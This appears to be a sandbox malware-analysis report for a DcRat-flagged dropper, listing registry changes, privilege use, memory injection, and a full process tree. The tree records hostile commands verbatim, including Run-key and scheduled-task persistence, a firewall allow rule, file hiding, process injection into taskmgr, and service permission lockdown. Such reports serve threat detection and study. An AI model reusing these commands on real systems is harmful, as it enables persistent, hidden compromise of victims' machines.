Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2001 = "Cabo Verde Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	windefender.exe

Modifies registry class 3 IoCs

Processes:

winhostDhcp.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings	winhostDhcp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

toolspub1.exesvchost.exeVCDDaemon.exensp2AF5.tmpwinhostDhcp.exe

pid	Process
5024	toolspub1.exe
5024	toolspub1.exe
3980	svchost.exe
3576
3576
3576
3576
3576
3576
3576
3576
3980	svchost.exe
3980	svchost.exe
3576
3576
3576
3576
3576
3576
3576
3576
3576
3576
3576
3576
3576
3576
4464	VCDDaemon.exe
3576
3576
3576
3576
4464	VCDDaemon.exe
4464	VCDDaemon.exe
3576
3576
852	nsp2AF5.tmp
852	nsp2AF5.tmp
2984	winhostDhcp.exe
2984	winhostDhcp.exe
2984	winhostDhcp.exe
2984	winhostDhcp.exe
2984	winhostDhcp.exe
3576
3576
3576
3576
2984	winhostDhcp.exe
2984	winhostDhcp.exe
2984	winhostDhcp.exe
2984	winhostDhcp.exe
2984	winhostDhcp.exe
2984	winhostDhcp.exe
2984	winhostDhcp.exe
2984	winhostDhcp.exe
3576
3576
3576
3576
3576
3576
3576
3576
2984	winhostDhcp.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

winhostDhcp.exe

pid	Process
3444	winhostDhcp.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid	Process
668

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

toolspub1.exeVCDDaemon.execmd.exetoolspub1.exe

pid	Process
5024	toolspub1.exe
4464	VCDDaemon.exe
2336	cmd.exe
2336	cmd.exe
852	toolspub1.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4363463463464363463463463.exeBestSoftware.exewerfault.exe7z.exe7z.exe7z.exe7z.exewinhostDhcp.exe

description	pid	Process
Token: SeDebugPrivilege	2604	4363463463464363463463463.exe
Token: SeDebugPrivilege	4492	BestSoftware.exe
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeDebugPrivilege	3748	werfault.exe
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeRestorePrivilege	5104	7z.exe
Token: 35	5104	7z.exe
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeSecurityPrivilege	5104	7z.exe
Token: SeSecurityPrivilege	5104	7z.exe
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeRestorePrivilege	4416	7z.exe
Token: 35	4416	7z.exe
Token: SeSecurityPrivilege	4416	7z.exe
Token: SeSecurityPrivilege	4416	7z.exe
Token: SeRestorePrivilege	2088	7z.exe
Token: 35	2088	7z.exe
Token: SeSecurityPrivilege	2088	7z.exe
Token: SeSecurityPrivilege	2088	7z.exe
Token: SeRestorePrivilege	4696	7z.exe
Token: 35	4696	7z.exe
Token: SeSecurityPrivilege	4696	7z.exe
Token: SeSecurityPrivilege	4696	7z.exe
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeDebugPrivilege	2984	winhostDhcp.exe
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576
Token: SeShutdownPrivilege	3576
Token: SeCreatePagefilePrivilege	3576

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

BroomSetup.exesvchost.exe9B71.exesouth.exeasg.exe

pid	Process
5076	BroomSetup.exe
3980	svchost.exe
3980	svchost.exe
2092	9B71.exe
1752	south.exe
2072	asg.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid	Process
3576

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.execayV0Deo9jSt417.execlip.exedvchost.exelatestroc.execmd.exeInstallSetup8.exeBestSoftware.exe

description	pid	Process	procid_target
PID 2604 wrote to memory of 2140	2604	4363463463464363463463463.exe	87
PID 2604 wrote to memory of 2140	2604	4363463463464363463463463.exe	87
PID 2604 wrote to memory of 2140	2604	4363463463464363463463463.exe	87
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2140 wrote to memory of 2000	2140	cayV0Deo9jSt417.exe	89
PID 2000 wrote to memory of 3760	2000	clip.exe	91
PID 2000 wrote to memory of 3760	2000	clip.exe	91
PID 2000 wrote to memory of 3760	2000	clip.exe	91
PID 2604 wrote to memory of 4492	2604	4363463463464363463463463.exe	93
PID 2604 wrote to memory of 4492	2604	4363463463464363463463463.exe	93
PID 2604 wrote to memory of 4492	2604	4363463463464363463463463.exe	93
PID 2604 wrote to memory of 4484	2604	4363463463464363463463463.exe	95
PID 2604 wrote to memory of 4484	2604	4363463463464363463463463.exe	95
PID 2604 wrote to memory of 4484	2604	4363463463464363463463463.exe	95
PID 2604 wrote to memory of 2348	2604	4363463463464363463463463.exe	96
PID 2604 wrote to memory of 2348	2604	4363463463464363463463463.exe	96
PID 2604 wrote to memory of 2348	2604	4363463463464363463463463.exe	96
PID 2604 wrote to memory of 440	2604	4363463463464363463463463.exe	99
PID 2604 wrote to memory of 440	2604	4363463463464363463463463.exe	99
PID 2604 wrote to memory of 440	2604	4363463463464363463463463.exe	99
PID 2604 wrote to memory of 4444	2604	4363463463464363463463463.exe	100
PID 2604 wrote to memory of 4444	2604	4363463463464363463463463.exe	100
PID 2604 wrote to memory of 4444	2604	4363463463464363463463463.exe	100
PID 4484 wrote to memory of 3196	4484	dvchost.exe	102
PID 4484 wrote to memory of 3196	4484	dvchost.exe	102
PID 440 wrote to memory of 2576	440	latestroc.exe	104
PID 440 wrote to memory of 2576	440	latestroc.exe	104
PID 440 wrote to memory of 2576	440	latestroc.exe	104
PID 440 wrote to memory of 5024	440	latestroc.exe	105
PID 440 wrote to memory of 5024	440	latestroc.exe	105
PID 440 wrote to memory of 5024	440	latestroc.exe	105
PID 3196 wrote to memory of 3692	3196	cmd.exe	134
PID 3196 wrote to memory of 3692	3196	cmd.exe	134
PID 440 wrote to memory of 1360	440	latestroc.exe	107
PID 440 wrote to memory of 1360	440	latestroc.exe	107
PID 440 wrote to memory of 1360	440	latestroc.exe	107
PID 2604 wrote to memory of 780	2604	4363463463464363463463463.exe	108
PID 2604 wrote to memory of 780	2604	4363463463464363463463463.exe	108
PID 2576 wrote to memory of 5076	2576	InstallSetup8.exe	109
PID 2576 wrote to memory of 5076	2576	InstallSetup8.exe	109
PID 2576 wrote to memory of 5076	2576	InstallSetup8.exe	109
PID 440 wrote to memory of 5064	440	latestroc.exe	112
PID 440 wrote to memory of 5064	440	latestroc.exe	112
PID 2604 wrote to memory of 3980	2604	4363463463464363463463463.exe	113
PID 2604 wrote to memory of 3980	2604	4363463463464363463463463.exe	113
PID 2604 wrote to memory of 3980	2604	4363463463464363463463463.exe	113
PID 4492 wrote to memory of 4092	4492	BestSoftware.exe	114
PID 4492 wrote to memory of 4092	4492	BestSoftware.exe	114
PID 4492 wrote to memory of 4092	4492	BestSoftware.exe	114
PID 4492 wrote to memory of 4092	4492	BestSoftware.exe	114
PID 4492 wrote to memory of 4092	4492	BestSoftware.exe	114
PID 4492 wrote to memory of 4092	4492	BestSoftware.exe	114
PID 4492 wrote to memory of 4092	4492	BestSoftware.exe	114
PID 4492 wrote to memory of 4092	4492	BestSoftware.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
3692	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- DcRat
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2604
- C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2140
- - C:\Windows\SysWOW64\clip.exe
    "C:\Windows\SysWOW64\clip.exe"
    3⤵
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2000
  - - C:\Users\Admin\AppData\Roaming\System32\taskhost.exe
      "C:\Users\Admin\AppData\Roaming\System32\taskhost.exe"
      4⤵
      Executes dropped EXE
      PID:3760
- C:\Users\Admin\AppData\Local\Temp\Files\BestSoftware.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\BestSoftware.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4492
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:4092
- C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3196
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:3692
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e file.zip -p1979614625696244291525413362 -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:5104
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_1.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:4696
  - - C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe
      "winhostDhcp.exe"
      4⤵
      DcRat
      Checks computer location settings
      Executes dropped EXE
      Drops file in System32 directory
      Drops file in Program Files directory
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2984
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LI7DzOA1mG.bat"
        5⤵
        
        PID:2516
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:4856
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:5012
      - C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3444
  - - C:\Windows\system32\attrib.exe
      attrib +H "winhostDhcp.exe"
      4⤵
      Views/modifies file attributes
      PID:3692
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_2.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:2088
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_3.zip -oextracted
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:4416
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  PID:2348
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_technical_school';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_technical_school' -Value '"C:\Users\Admin\AppData\Local\Tests_for_preparation_for_technical_school\Tests_for_preparation_for_technical_school.exe"' -PropertyType 'String'
    3⤵
    - Adds Run key to start application
    PID:2684
- C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:440
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2576
  - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5076
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        5⤵
        
        PID:3772
  - - C:\Users\Admin\AppData\Local\Temp\nsp2AF5.tmp
      C:\Users\Admin\AppData\Local\Temp\nsp2AF5.tmp
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:852
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsp2AF5.tmp" & del "C:\ProgramData\*.dll"" & exit
        5⤵
        
        PID:1940
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        6⤵
        Delays execution with timeout.exe
        
        PID:4636
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 2188
        5⤵
        Program crash
        
        PID:680
- - C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:5024
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:1360
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 372
      4⤵
      Program crash
      PID:4996
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 388
      4⤵
      Program crash
      PID:1200
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 392
      4⤵
      Program crash
      PID:1436
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 684
      4⤵
      Program crash
      PID:2528
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 684
      4⤵
      Program crash
      PID:3300
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 740
      4⤵
      Program crash
      PID:4420
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 760
      4⤵
      Program crash
      PID:3220
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 760
      4⤵
      Program crash
      PID:3640
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 720
      4⤵
      Program crash
      PID:2292
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 788
      4⤵
      Program crash
      PID:2528
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 784
      4⤵
      Program crash
      PID:2584
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 684
      4⤵
      Program crash
      PID:3216
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 812
      4⤵
      Program crash
      PID:3324
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 672
      4⤵
      Program crash
      PID:4552
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 780
      4⤵
      Program crash
      PID:1900
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 796
      4⤵
      Program crash
      PID:2700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 624
      4⤵
      Program crash
      PID:2296
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 808
      4⤵
      Program crash
      PID:1992
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 888
      4⤵
      Program crash
      PID:1648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Blocklisted process makes network request
      PID:3616
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      PID:1336
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 344
        5⤵
        Program crash
        
        PID:3700
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 360
        5⤵
        Program crash
        
        PID:3608
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 228
        5⤵
        Program crash
        
        PID:3156
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 644
        5⤵
        Program crash
        
        PID:1844
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 656
        5⤵
        Program crash
        
        PID:4412
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 656
        5⤵
        Program crash
        
        PID:3336
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 656
        5⤵
        Program crash
        
        PID:1588
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 720
        5⤵
        Program crash
        
        PID:1800
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 744
        5⤵
        Program crash
        
        PID:772
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4288
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2392
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5012
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2744
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3668
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        
        PID:2080
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 264
        6⤵
        Program crash
        
        PID:1780
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 388
        6⤵
        Program crash
        
        PID:2076
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 392
        6⤵
        Program crash
        
        PID:1708
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 680
        6⤵
        Program crash
        
        PID:4924
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 720
        6⤵
        Program crash
        
        PID:4036
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 732
        6⤵
        Program crash
        
        PID:464
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 748
        6⤵
        Program crash
        
        PID:3156
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 764
        6⤵
        Program crash
        
        PID:2584
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 784
        6⤵
        Program crash
        
        PID:2928
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        
        PID:1860
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 876
        6⤵
        Program crash
        
        PID:4536
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:4796
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:2292
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4216
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 928
        6⤵
        Program crash
        
        PID:2212
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1268
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2984
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 856
        6⤵
        Program crash
        
        PID:1844
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 956
        6⤵
        Program crash
        
        PID:1092
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        
        PID:3216
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:1384
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 916
        6⤵
        Program crash
        
        PID:3364
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 1032
        6⤵
        Drops file in System32 directory
        Program crash
        Modifies data under HKEY_USERS
        
        PID:4216
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:1328
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:2396
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        
        PID:4336
